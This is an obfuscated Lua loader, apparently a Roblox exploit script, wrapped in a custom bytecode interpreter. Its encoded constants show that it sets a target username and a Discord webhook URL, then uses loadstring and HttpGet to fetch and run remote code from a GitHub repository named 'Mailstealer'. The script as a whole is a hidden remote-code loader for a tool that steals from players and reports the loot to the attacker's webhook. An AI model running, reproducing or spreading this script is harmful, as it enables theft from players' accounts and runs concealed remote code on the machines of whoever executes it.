--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.14) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v71=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (932 -(857 + 74)))) ;return v71-(v71%(569 -(367 + 201))) ;else local v72=(929 -(214 + 713))^(v32-((878 -(282 + 595)) + (1637 -(1523 + 114)))) ;return (((v31%(v72 + v72))>=v72) and (1 + 0)) or 0 ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34=0 + 0 + 0 ;local v35;local v36;local v37;local v38;while true do if (v34==0) then v35,v36,v37,v38=v1(v16,v19,v19 + (3 -0) );v19=v19 + (1069 -(68 + 997)) ;v34=(2228 -(892 + 65)) -(226 + 1044) ;end if (v34==1) then return (v38 * (73054774 -(134251840 -77974282))) + (v37 * (65653 -(32 + 85))) + (v36 * (251 + 5)) + v35 ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v39=0 + 0 ;local v40;local v41;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v39==(2 + 1)) then v46=nil;v47=nil;v39=442 -(262 + 176) ;end if ((1721 -(345 + 1376))==v39) then v40=688 -(198 + 490) ;v41=nil;v39=4 -3 ;end if (v39~=(2 -1)) then else v42=nil;v43=nil;v39=1208 -(696 + 510) ;end if (v39~=(3 -1)) then else v44=nil;v45=nil;v39=3;end if (v39~=4) then else while true do if (1~=v40) then else local v98=1262 -(1091 + 171) ;while true do if (v98==1) then v40=2;break;end if (v98~=(0 + 0)) then else v43=nil;v44=nil;v98=3 -2 ;end end end if (v40==(9 -6)) then v47=nil;while true do local v101=374 -(123 + 251) ;while true do if ((4 -3)==v101) then if (v41==0) then v42={};v43={};v44={};v45={v42,v43,nil,v44};v41=837 -(660 + 176) ;end break;end if (v101==(0 + 0)) then local v106=0;while true do if (v106==1) then v101=203 -(14 + 188) ;break;end if (v106==0) then if (v41==1) then local v128=675 -(534 + 141) ;while true do if (1==v128) then local v157=0;while true do if ((0 + 0)~=v157) then else for v172=1,v46 do local v173=0;local v174;local v175;local v176;local v177;local v178;while true do if (v173==(0 + 0)) then v174=0 + 0 ;v175=nil;v173=1;end if ((1 -0)==v173) then v176=nil;v177=nil;v173=2 -0 ;end if (v173==(5 -3)) then v178=nil;while true do if (v174~=0) then else local v179=0 + 0 ;while true do if (v179~=(0 + 0)) then else v175=0;v176=nil;v179=397 -(115 + 281) ;end if (v179==1) then v174=1;break;end end end if (v174~=1) then else v177=nil;v178=nil;v174=2;end if (v174==2) then while true do if (v175~=0) then else v176=0 -0 ;v177=nil;v175=1;end if (v175==1) then v178=nil;while true do if (v176~=(0 + 0)) then else local v186=0 -0 ;while true do if (v186==(0 -0)) then local v188=0;while true do if (v188==(868 -(550 + 317))) then v186=1;break;end if (v188==(0 -0)) then v177=v22();v178=nil;v188=1 -0 ;end end end if (v186==1) then v176=2 -1 ;break;end end end if ((286 -(134 + 151))~=v176) then else if (v177==(1666 -(970 + 695))) then v178=v22()~=(0 -0) ;elseif (v177==2) then v178=v25();elseif (v177==3) then v178=v26();end v47[v172]=v178;break;end end break;end end break;end end break;end end end v45[3]=v22();v157=1;end if (v157==1) then v128=2;break;end end end if ((1990 -(582 + 1408))==v128) then local v158=0;while true do if (0==v158) then v46=v24();v47={};v158=1;end if (v158==(3 -2)) then v128=1 -0 ;break;end end end if (v128~=(7 -5)) then else v41=1826 -(1195 + 629) ;break;end end end if (v41~=2) then else local v129=0 -0 ;while true do if (v129~=(242 -(187 + 54))) then else return v45;end if (v129~=0) then else for v159=781 -(162 + 618) ,v24() do local v160=0 + 0 ;local v161;local v162;local v163;local v164;while true do if (1~=v160) then else v163=nil;v164=nil;v160=2 + 0 ;end if (v160==(0 -0)) then v161=0 -0 ;v162=nil;v160=1;end if (2==v160) then while true do if (v161==(1 + 0)) then v164=nil;while true do if (v162==0) then v163=1636 -(1373 + 263) ;v164=nil;v162=1;end if (v162==1) then while true do if (v163~=0) then else v164=v22();if (v21(v164,1001 -(451 + 549) ,1)==0) then local v180=0 + 0 ;local v181;local v182;local v183;local v184;local v185;while true do if ((0 -0)~=v180) then else v181=0;v182=nil;v180=1;end if (v180==(2 -0)) then v185=nil;while true do if (v181~=2) then else while true do if (3==v182) then if (v21(v184,3,1387 -(746 + 638) )==1) then v185[2 + 2 ]=v47[v185[4]];end v42[v159]=v185;break;end if (v182==1) then local v191=0 -0 ;while true do if (v191~=(342 -(218 + 123))) then else v182=1583 -(1535 + 46) ;break;end if (v191==(0 + 0)) then v185={v23(),v23(),nil,nil};if (v183==0) then local v195=0 + 0 ;local v196;local v197;local v198;while true do if (v195~=(560 -(306 + 254))) then else v196=0 + 0 ;v197=nil;v195=1;end if (v195==(1 -0)) then v198=nil;while true do if (v196==0) then local v205=1467 -(899 + 568) ;while true do if (v205==(1 + 0)) then v196=1;break;end if (v205==0) then v197=0 -0 ;v198=nil;v205=604 -(268 + 335) ;end end end if (v196==1) then while true do if (0~=v197) then else v198=0;while true do if ((290 -(60 + 230))~=v198) then else v185[3]=v23();v185[576 -(426 + 146) ]=v23();break;end end break;end end break;end end break;end end elseif (v183==(1 + 0)) then v185[1459 -(282 + 1174) ]=v24();elseif (v183==2) then v185[814 -(569 + 242) ]=v24() -(2^16) ;elseif (v183~=3) then else local v206=0 -0 ;local v207;while true do if ((0 + 0)==v206) then v207=1024 -(706 + 318) ;while true do if (v207==(1251 -(721 + 530))) then v185[3]=v24() -(2^(1287 -(945 + 326))) ;v185[9 -5 ]=v23();break;end end break;end end end v191=1 + 0 ;end end end if (v182~=2) then else local v192=700 -(271 + 429) ;while true do if (v192==0) then if (v21(v184,1 + 0 ,1)~=1) then else v185[1502 -(1408 + 92) ]=v47[v185[2]];end if (v21(v184,2,2)~=(1087 -(461 + 625))) then else v185[1291 -(993 + 295) ]=v47[v185[3]];end v192=1 + 0 ;end if (v192~=1) then else v182=1174 -(418 + 753) ;break;end end end if (v182~=0) then else v183=v21(v164,1 + 1 ,1 + 2 );v184=v21(v164,4,6);v182=1 + 0 ;end end break;end if (v181==(0 + 0)) then v182=529 -(406 + 123) ;v183=nil;v181=1770 -(1749 + 20) ;end if (v181==1) then local v189=0;while true do if (0==v189) then v184=nil;v185=nil;v189=1;end if (1==v189) then v181=1 + 1 ;break;end end end end break;end if (v180~=1) then else v183=nil;v184=nil;v180=1324 -(1249 + 73) ;end end end break;end end break;end end break;end if (v161~=(0 + 0)) then else v162=0;v163=nil;v161=1;end end break;end end end for v165=1,v24() do v43[v165-1 ]=v29();end v129=1146 -(466 + 679) ;end end end v106=1;end end end end end break;end if (v40~=0) then else local v99=0;while true do if (v99~=0) then else v41=0;v42=nil;v99=2 -1 ;end if (v99==(2 -1)) then v40=1;break;end end end if (v40==2) then local v100=1900 -(106 + 1794) ;while true do if (v100~=0) then else v45=nil;v46=nil;v100=1;end if (v100~=1) then else v40=1 + 2 ;break;end end end end break;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v48=v24();local v49=v24();local v50=66 -(9 + 21 + 35) ;local v51=(v21(v49,1 + 0 ,59 -39 ) * ((5 -3)^(146 -(4 + 110)))) + v48 ;local v52=v21(v49,(308 + 297) -(57 + 527) ,1458 -(41 + 1386) );local v53=((v21(v49,352 -(53 + 267) )==(1 + 0)) and  -(1 + 0)) or (104 -(17 + (226 -140))) ;if (v52==(982 -(18 + 964))) then if (v51==((0 -0) + 0)) then return v53 * (0 -0) ;else local v79=0 -(1551 -(1126 + 425)) ;while true do if (v79==(0 -0)) then v52=(406 -(118 + 287)) + 0 ;v50=166 -((478 -356) + 44) ;break;end end end elseif (v52==(3535 -1488)) then return ((v51==(0 -(1121 -(118 + 1003)))) and (v53 * ((127 -(116 + 10))/(0 + (0 -0))))) or (v53 * NaN) ;end return v8(v53,v52-(148 + 875) ) * (v50 + (v51/((740 -((919 -(142 + 235)) + 196))^(104 -52)))) ;end v26=nil;function v26(v54)local v55;if  not v54 then local v73=0;while true do if ((0 -(0 -0))==v73) then v54=v24();if (v54==(0 + 0)) then return "";end break;end end end v55=v3(v16,v19,(v19 + v54) -(978 -(553 + 424)) );v19=v19 + v54 ;local v56={};for v69=1, #v55 do v56[v69]=v2(v1(v3(v55,v69,v69)));end return v6(v56);end v18=5;end if (v18==2) then function v22()local v57=v1(v16,v19,v19);v19=v19 + 1 ;return v57;end v23=nil;function v23()local v58=(0 -0) + 0 ;local v59;local v60;while true do if (v58==(1 + 0)) then return (v60 * (150 + 106)) + v59 ;end if (v58==(0 + (0 -0))) then v59,v60=v1(v16,v19,v19 + 2 );v19=v19 + 2 + 0 + 0 ;v58=2 -1 ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v61)if (v1(v61,2)==79) then local v74=0;while true do if (v74==0) then v20=v0(v3(v61,1,1));return "";end end else local v75=v2(v0(v61,16));if v20 then local v80=v5(v75,v20);v20=nil;return v80;else return v75;end end end);v18=1;end if (v18==7) then function v30(v62,v63,v64)local v65=0;local v66;local v67;local v68;while true do if (v65==1) then v68=v62[3];return function(...)local v81=v66;local v82=v67;local v83=v68;local v84=v28;local v85=1;local v86= -1;local v87={};local v88={...};local v89=v12("#",...) -1 ;local v90={};local v91={};for v95=0,v89 do if (v95>=v83) then v87[v95-v83 ]=v88[v95 + 1 ];else v91[v95]=v88[v95 + 1 ];end end local v92=(v89-v83) + 1 ;local v93;local v94;while true do v93=v81[v85];v94=v93[1];if (v94<=9) then if (v94<=4) then if (v94<=1) then if (v94>0) then do return;end else v85=v93[3];end elseif (v94<=2) then v64[v93[3]]=v91[v93[2]];elseif (v94==3) then local v130=v93[2];local v131=v91[v93[3]];v91[v130 + 1 ]=v131;v91[v130]=v131[v93[4]];else v91[v93[2]]();end elseif (v94<=6) then if (v94>5) then v91[v93[2]]();else v91[v93[2]]=v64[v93[3]];end elseif (v94<=7) then local v112=0;local v113;local v114;local v115;local v116;while true do if (v112==1) then v86=(v115 + v113) -1 ;v116=0;v112=2;end if (v112==0) then v113=v93[2];v114,v115=v84(v91[v113](v13(v91,v113 + 1 ,v93[3])));v112=1;end if (v112==2) then for v152=v113,v86 do local v153=0;while true do if (v153==0) then v116=v116 + 1 ;v91[v152]=v114[v116];break;end end end break;end end elseif (v94==8) then v85=v93[3];else v64[v93[3]]=v91[v93[2]];end elseif (v94<=14) then if (v94<=11) then if (v94==10) then if (v91[v93[2]]==v93[4]) then v85=v85 + 1 ;else v85=v93[3];end else local v117=0;local v118;while true do if (v117==0) then v118=v93[2];v91[v118]=v91[v118](v13(v91,v118 + 1 ,v86));break;end end end elseif (v94<=12) then do return;end elseif (v94>13) then v91[v93[2]]=v93[3];else v91[v93[2]]=v64[v93[3]];end elseif (v94<=16) then if (v94==15) then local v119=v93[2];v91[v119]=v91[v119](v13(v91,v119 + 1 ,v86));else local v121=0;local v122;local v123;local v124;local v125;while true do if (v121==0) then v122=v93[2];v123,v124=v84(v91[v122](v13(v91,v122 + 1 ,v93[3])));v121=1;end if (2==v121) then for v154=v122,v86 do local v155=0;while true do if (v155==0) then v125=v125 + 1 ;v91[v154]=v123[v125];break;end end end break;end if (1==v121) then v86=(v124 + v122) -1 ;v125=0;v121=2;end end end elseif (v94<=17) then v91[v93[2]]=v93[3];elseif (v94>18) then if (v91[v93[2]]==v93[4]) then v85=v85 + 1 ;else v85=v93[3];end else local v143=v93[2];local v144=v91[v93[3]];v91[v143 + 1 ]=v144;v91[v143]=v144[v93[4]];end v85=v85 + 1 ;end end;end if (0==v65) then v66=v62[1];v67=v62[2];v65=1;end end end return v30(v29(),{},v17)(...);end end end v15("LOL!0B3O00028O00026O00F03F03093O00557365724E616D653203083O0067656A2O313O32030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F45676F72696B7573612F4D61696C737465616C65722F6D61696E2F656E67696E6503083O00557365724E616D6503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31343036373934303532393137302O3433312F7A685A74644B52536B4A6C39306234792O693143323865614B7A6F75514D714250797463724F564C35546E637758424D525131686D364A68324D4772567652574F73556400163O00120E3O00013O0026133O000D0001000200044O000D000100120E000100043O001202000100033O00120D000100053O00120D000200063O00200300020002000700120E000400084O0010000200044O000F00013O00022O000400010001000100044O001500010026133O00010001000100044O0001000100120E000100043O001202000100093O00120E0001000B3O0012020001000A3O00120E3O00023O00044O000100012O000C3O00017O00",v9(),...);
